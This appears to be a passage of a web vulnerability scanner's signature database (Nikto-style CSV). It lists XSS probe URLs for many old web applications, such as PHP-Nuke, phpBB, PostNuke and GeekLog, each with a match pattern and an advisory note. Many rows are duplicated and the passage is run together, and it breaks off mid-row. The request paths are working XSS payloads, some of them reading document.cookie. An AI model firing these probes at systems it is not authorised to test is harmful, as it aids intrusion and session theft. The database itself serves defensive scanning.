"000769","0","4","/~/<script>alert('Vulnerable')</script>.asp","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Cross site scripting (XSS) is allowed with .asp file requests (may be Microsoft .net). CA-2000-02","","" 792 "000770","58957","4","/z_user_show.php?method=showuserlink&class=<Script>javascript:alert(document.cookie)</Script>&rollid=admin&x=3da59a9da8825&","GET","<script>alert\(document\.cookie\)<\/script>","","","","","orum 2.4 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 793 793 "000771","0","4","/catinfo?<u><b>TESTING","GET","<u><b>TESTING","","","","","The Interscan Viruswall catinfo script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 794 "000772","0","4","/webchat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>","GET","alert (\"Vulnerable\")</script>","","","","","PHP Web Chat 2.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""795 "000773","0","4","/webamil/test.php","GET","IMP: 3 .(0|1|2|2\.1)","","","","","IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerabl to Cross Site Scripting (XSS). See http://marc.theaimsgroup.com/?l=imp&m=105940167329471&w=2.","",""796 "000774","59444","4","/users.php?mode=profile&uid=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","GeekLog 1.3.7 allows Cross Site Scripting (XSS). CA-2000-02.","",""797 "000775","0","4","/usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27)","GET","<script>alert ('Vulnerable')</script>","","","","","IcrediBB Bulletin Board System is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""798 "000776","0","4","/user.php?op=userinfo&uname=<script>alert('hi');</script>","GET","<script>alert ('hi');</script>","","","","","The PHP-Nuke installation is vulnerable to Cross Site Scripting (XSS). Update to versions above 5.3.1. CA-2000-02.","",""799 "000777","0","4","/user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com","GET","javascript:alert (document.cookie)","","","","","Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""800 "000778","0","4","/user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com","GET","<script>alert (document.cookie)","","","","","Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""801 "000779","0","4","/TopSitesdirectory/help.php?sid=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","PHP TopSites allows Cross Site Scripting (XSS). CA-2000-02.","",""802 "000780","41361","4","/templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>","GET","<script>javascript:alert (document.cookie)","","","","","MyMarket 1.71 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""803 "000781","41361","4","/templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>","GET","<script>alert (document.cookie)","","","","","MyMarket 1.71 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""804 "000782","9238","4","/supporter/index.php?t=updateticketlog&id=<script><script>alert('Vulnerable')</script></script>","GET","<script>alert ('Vulnerable')</script>","","","","","MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""805 "000783","9238","4","/supporter/index.php?t=tickettime&id=<script><script>alert('Vulnerable')</script></script>","GET","<script>alert ('Vulnerable')</script>","","","","","MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""806 "000784","9238","4","/supporter/index.php?t=ticketfiles&id=<script><script>alert('Vulnerable')</script></script>","GET","<script>alert ('Vulnerable')</script>","","","","","MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""807 "000785","0","4","/sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.","",""808 "000786","20232","4","/submit.php?subject=<script>alert('Vulnerable')</script>&story=<script>alert('Vulnerable')</script>&storyext=<script>alert('Vulnerable')</script>&op=Preview","GET","<script>alert ('Vulnerable')</script>","","","","","This install of PHP-Nuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""809 "000787","27097","4","/ss000007.pl?PRODREF=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""810 "000788","59014","4","/showcat.php?catid=<Script>JavaScript:alert('Vulnerable');</Script>","GET","<script>alert ('Vulnerable')</script>","","","","","phpLinkat is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""811 "000789","0","4","/shop/normal_html.cgi?file=<script>alert(\"Vulnerable\")</script>","GET","<script>alert (\"Vulnerable\")</script>","","","","","Happymail E-Commerce is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""812 "000790","5049","4","/setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P","GET","<script>alert ('Vulnerable')</script>","","","","","CiscoSecure ACS v3.0(1) Build 40 allows Cross Site Scripting (XSS). CA-2000-02.","",""813 "000791","0","4","/servlet/custMsg?guestName=<script>alert(\"Vulnerable\")</script>","POST","<script>alert (\"Vulnerable\")</script>","","","","","Bajie HTTP JServer is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""814 "000792","2689","4","/servlet/CookieExample?cookiename=<script>alert(\"Vulnerable\")</script>","POST","<script>alert (\"Vulnerable\")</script>","","","","","Bajie HTTP JServer is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""815 "000793","2689","4","/servlet/ContentServer?pagename=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Open Market Inc. ContentServer is vulnerable to Cross Site Scripting (XSS) in the login-error page. CA-2000-02.","",""816 "000794","0","4","/search/index.cfm?<script>alert(\"Vulnerable\")</script>","GET","<script>alert (\"Vulnerable\")</script>","","","","","Search agent allows Cross Site Scripting (XSS). CA-2000-02.","",""817 "000795","0","4","/search/?SectionIDOverride=1&SearchText=<script>alert(document.cookie);</script>","GET","<script>alert (document.cookie)</script>","","","","","ezPublish 2.27 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""818 "000796","2669","4","/search.php?zoom_query=<script>alert(\"hello\")</script>","GET","<script>alert (\"hello\")</script>","","","","","Wrensoft Zoom Search Engine is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""819 "000797","2322","4","/search.php?searchstring=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. BID-8288.","",""820 "000798","50551","4","/search.php?searchfor=\"><script>alert('Vulnerable');</script>","GET","alert ('Vulnerable')","","","","","Siteframe 2.2.4 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""821 "000799","0","4","/search.asp?term=<%00script>alert('Vulnerable')</script>","GET","alert ('Vulnerable')</script>","","","","","ASP.Net 1.1 may allow Cross Site Scripting (XSS) in error pages (only some browsers will render this). CA-2000-02.","",""822 "000800","0","4","/script>alert('Vulnerable')</script>.cfm","GET","<script>alert ('Vulnerable')</script>","","","","","Macromedia's ColdFusion MX server is vulnerable to Cross Site Scripting (XSS). CA-2000-02. Patch or upgrade to a newer version, or change the default 404 document. http://www.macromedia.com/v1/handlers/index.cfm?ID=23047","",""823 "000801","0","4","/samples/search.dll?query=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","&logic=AND",""824 "000802","0","4","/replymsg.php?send=1&destin=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","This version of PHP-Nuke's replymsg.php is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""825 "000803","59443","4","/profiles.php?uid=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","GeekLog 1.3.7 allows Cross Site Scripting (XSS). CA-2000-02.","",""826 "000804","0","4","/postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft Utilities\"%3<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Postnuke Phoenix 0.7.2.3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""827 "000805","0","4","/postnuke/html/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>","GET","<script>alert ('Vulnerable')</script>","","","","","PostNuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""828 "000806","4599","4","/pm_buddy_list.asp?name=A&desc=B%22%3E<script>alert('Vulnerable')</script>%3Ca%20s=%22&code=1","GET","<script>alert ('Vulnerable')</script>","","","","","Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""829 "000807","0","4","/pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello","GET","<script>alert ('Vulnerable')</script>","","","","","WoltLab Burning Board is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""830 "000808","0","4","/pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit","GET","<script>alert ('Vulnerable')</script>","","","","","IcrediBB Bulletin Board System is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""831 "000809","0","4","/phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\"><script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""832 "000810","0","4","/phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\"><script>alert('Vulnerable')</script>&MMN_position=[X:X]","GET","<script>alert ('Vulnerable')</script>","","","","","phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""833 "000811","0","4","/phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\"><script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""834 "000812","0","4","/phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\"><script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""835 "000813","0","4","/phpwebchat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>","GET","alert (\"Vulnerable\")</script>","","","","","PHP Web Chat 2.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""836 "000814","59093","4","/phptonuke.php?filnavn=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","PHP-Nuke add-on PHPToNuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""837 "000815","37511","4","/phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(Vulnerable)%3C/script%3E","GET","<script>alert (Vulnerable)</script>","","","","","phpRank is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""838 "000816","32774","4","/phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).","",""839 "000817","32774","4","/phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).","",""840 "000818","27071","4","/phpimageview.php?pic=javascript:alert('Vulnerable')","GET","alert ('Vulnerable')","","","","","PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02."," ",""841 "000819","0","4","/phpclassifieds/latestwap.php?url=<script>alert('Vulnerable');</script>","GET","<script>alert ('Vulnerable')</script>","","","","","PHP Classifieds 6.05 from http://www.deltascripts.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""842 "000820","2193","4","/phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","phpBB is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02.","",""843 "000821","4297","4","/phpBB/viewtopic.php?t=17071&highlight=\">\"<script>javascript:alert(document.cookie)</script>","GET","<script>javascript:alert (document.cookie)</script>","","","","","phpBB is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""844 "000822","11145","4","/phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""845 "000823","11144","4","/phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""846 "000824","0","4","/pforum/edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1","GET","<script>alert ('Vulnerable')</script>","","","","","Pforum 1.14 is vulnerable to Cross Site Scripting (XSS). CA-2000-02","",""847 "000825","0","4","/pages/htmlos/%3Cscript%3Ealert('Vulnerable');%3C/script%3E","GET","<script>alert ('Vulnerable')</script>","","","","","Aestiva HTML/OS is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""848 "000826","0","4","/Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Vignette server is vulnerable to Cross Site Scripting (XSS). CA-2000-02. Upgrade to the latest version.","",""794 "000772","0","4","/webchat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>","GET","alert\(\"Vulnerable\"\)<\/script>","","","","","PHP Web Chat 2.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 795 "000773","0","4","/webamil/test.php","GET","IMP: 3\.\(0\|1\|2\|2\\\.1\)","","","","","IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerabl to Cross Site Scripting (XSS). See http://marc.theaimsgroup.com/?l=imp&m=105940167329471&w=2.","","" 796 "000774","59444","4","/users.php?mode=profile&uid=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","GeekLog 1.3.7 allows Cross Site Scripting (XSS). CA-2000-02.","","" 797 "000775","0","4","/usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27)","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","IcrediBB Bulletin Board System is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 798 "000776","0","4","/user.php?op=userinfo&uname=<script>alert('hi');</script>","GET","<script>alert\('hi'\);<\/script>","","","","","The PHP-Nuke installation is vulnerable to Cross Site Scripting (XSS). Update to versions above 5.3.1. CA-2000-02.","","" 799 "000777","0","4","/user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com","GET","javascript:alert\(document\.cookie\)","","","","","Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 800 "000778","0","4","/user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com","GET","<script>alert\(document\.cookie\)","","","","","Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 801 "000779","0","4","/TopSitesdirectory/help.php?sid=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","PHP TopSites allows Cross Site Scripting (XSS). CA-2000-02.","","" 802 "000780","41361","4","/templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>","GET","<script>javascript:alert\(document\.cookie\)","","","","","MyMarket 1.71 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 803 "000781","41361","4","/templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)","","","","","MyMarket 1.71 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 804 "000782","9238","4","/supporter/index.php?t=updateticketlog&id=<script><script>alert('Vulnerable')</script></script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 805 "000783","9238","4","/supporter/index.php?t=tickettime&id=<script><script>alert('Vulnerable')</script></script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 806 "000784","9238","4","/supporter/index.php?t=ticketfiles&id=<script><script>alert('Vulnerable')</script></script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 807 "000785","0","4","/sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.","","" 808 "000786","20232","4","/submit.php?subject=<script>alert('Vulnerable')</script>&story=<script>alert('Vulnerable')</script>&storyext=<script>alert('Vulnerable')</script>&op=Preview","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","This install of PHP-Nuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 809 "000787","27097","4","/ss000007.pl?PRODREF=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 810 "000788","59014","4","/showcat.php?catid=<Script>JavaScript:alert('Vulnerable');</Script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","phpLinkat is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 811 "000789","0","4","/shop/normal_html.cgi?file=<script>alert(\"Vulnerable\")</script>","GET","<script>alert\(\"Vulnerable\"\)<\/script>","","","","","Happymail E-Commerce is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 812 "000790","5049","4","/setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","CiscoSecure ACS v3.0(1) Build 40 allows Cross Site Scripting (XSS). CA-2000-02.","","" 813 "000791","0","4","/servlet/custMsg?guestName=<script>alert(\"Vulnerable\")</script>","POST","<script>alert\(\"Vulnerable\"\)<\/script>","","","","","Bajie HTTP JServer is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 814 "000792","2689","4","/servlet/CookieExample?cookiename=<script>alert(\"Vulnerable\")</script>","POST","<script>alert\(\"Vulnerable\"\)<\/script>","","","","","Bajie HTTP JServer is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 815 "000793","2689","4","/servlet/ContentServer?pagename=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Open Market Inc. ContentServer is vulnerable to Cross Site Scripting (XSS) in the login-error page. CA-2000-02.","","" 816 "000794","0","4","/search/index.cfm?<script>alert(\"Vulnerable\")</script>","GET","<script>alert\(\"Vulnerable\"\)<\/script>","","","","","Search agent allows Cross Site Scripting (XSS). CA-2000-02.","","" 817 "000795","0","4","/search/?SectionIDOverride=1&SearchText=<script>alert(document.cookie);</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","ezPublish 2.27 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 818 "000796","2669","4","/search.php?zoom_query=<script>alert(\"hello\")</script>","GET","<script>alert\(\"hello\"\)<\/script>","","","","","Wrensoft Zoom Search Engine is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 819 "000797","2322","4","/search.php?searchstring=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. BID-8288.","","" 820 "000798","50551","4","/search.php?searchfor=\"><script>alert('Vulnerable');</script>","GET","alert\('Vulnerable'\)","","","","","Siteframe 2.2.4 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 821 "000799","0","4","/search.asp?term=<%00script>alert('Vulnerable')</script>","GET","alert\('Vulnerable'\)<\/script>","","","","","ASP.Net 1.1 may allow Cross Site Scripting (XSS) in error pages (only some browsers will render this). CA-2000-02.","","" 822 "000800","0","4","/script>alert('Vulnerable')</script>.cfm","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Macromedia's ColdFusion MX server is vulnerable to Cross Site Scripting (XSS). CA-2000-02. Patch or upgrade to a newer version, or change the default 404 document. http://www.macromedia.com/v1/handlers/index.cfm?ID=23047","","" 823 "000801","0","4","/samples/search.dll?query=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","&logic=AND","" 824 "000802","0","4","/replymsg.php?send=1&destin=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","This version of PHP-Nuke's replymsg.php is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 825 "000803","59443","4","/profiles.php?uid=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","GeekLog 1.3.7 allows Cross Site Scripting (XSS). CA-2000-02.","","" 826 "000804","0","4","/postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft Utilities\"%3<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Postnuke Phoenix 0.7.2.3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 827 "000805","0","4","/postnuke/html/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","PostNuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 828 "000806","4599","4","/pm_buddy_list.asp?name=A&desc=B%22%3E<script>alert('Vulnerable')</script>%3Ca%20s=%22&code=1","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 829 "000807","0","4","/pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","WoltLab Burning Board is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 830 "000808","0","4","/pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","IcrediBB Bulletin Board System is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 831 "000809","0","4","/phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 832 "000810","0","4","/phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\"><script>alert('Vulnerable')</script>&MMN_position=[X:X]","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 833 "000811","0","4","/phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 834 "000812","0","4","/phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 835 "000813","0","4","/phpwebchat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>","GET","alert\(\"Vulnerable\"\)<\/script>","","","","","PHP Web Chat 2.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 836 "000814","59093","4","/phptonuke.php?filnavn=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","PHP-Nuke add-on PHPToNuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 837 "000815","37511","4","/phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(Vulnerable)%3C/script%3E","GET","<script>alert\(Vulnerable\)<\/script>","","","","","phpRank is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 838 "000816","32774","4","/phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).","","" 839 "000817","32774","4","/phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).","","" 840 "000818","27071","4","/phpimageview.php?pic=javascript:alert('Vulnerable')","GET","alert\('Vulnerable'\)","","","","","PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02."," ","" 841 "000819","0","4","/phpclassifieds/latestwap.php?url=<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","PHP Classifieds 6.05 from http://www.deltascripts.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 842 "000820","2193","4","/phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","phpBB is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02.","","" 843 "000821","4297","4","/phpBB/viewtopic.php?t=17071&highlight=\">\"<script>javascript:alert(document.cookie)</script>","GET","<script>javascript:alert\(document\.cookie\)<\/script>","","","","","phpBB is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 844 "000822","11145","4","/phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 845 "000823","11144","4","/phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 846 "000824","0","4","/pforum/edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Pforum 1.14 is vulnerable to Cross Site Scripting (XSS). CA-2000-02","","" 847 "000825","0","4","/pages/htmlos/%3Cscript%3Ealert('Vulnerable');%3C/script%3E","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Aestiva HTML/OS is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 848 "000826","0","4","/Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Vignette server is vulnerable to Cross Site Scripting (XSS). CA-2000-02. Upgrade to the latest version.","","" 849 849 "000827","2767","4","/openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>","GET","200","","","","","OpenAutoClassifieds 1.0 is vulnerable to a XSS attack","","" 850 "000828","2767","4","/openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>","GET","<script>alert (document.domain)</script>","","","","","OpenAutoClassifieds 1.x is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""851 "000829","0","4","/node/view/666\"><script>alert(document.domain)</script>","GET","<script>alert (document.domain)</script>","","","","","Drupal 4.2.0 RC is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""852 "000830","5106","4","/netutils/whodata.stm?sitename=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""853 "000831","0","4","/nav/cList.php?root=</script><script>alert('Vulnerable')/<script>","GET","<script>alert ('Vulnerable')/<script>","","","","","RaQ3 server script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""854 "000832","3931","4","/myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=","GET"," [script]alert('Vulnerable)","","","","","myphpnuke is vulnerable to Cross Site Scripting (XSS). 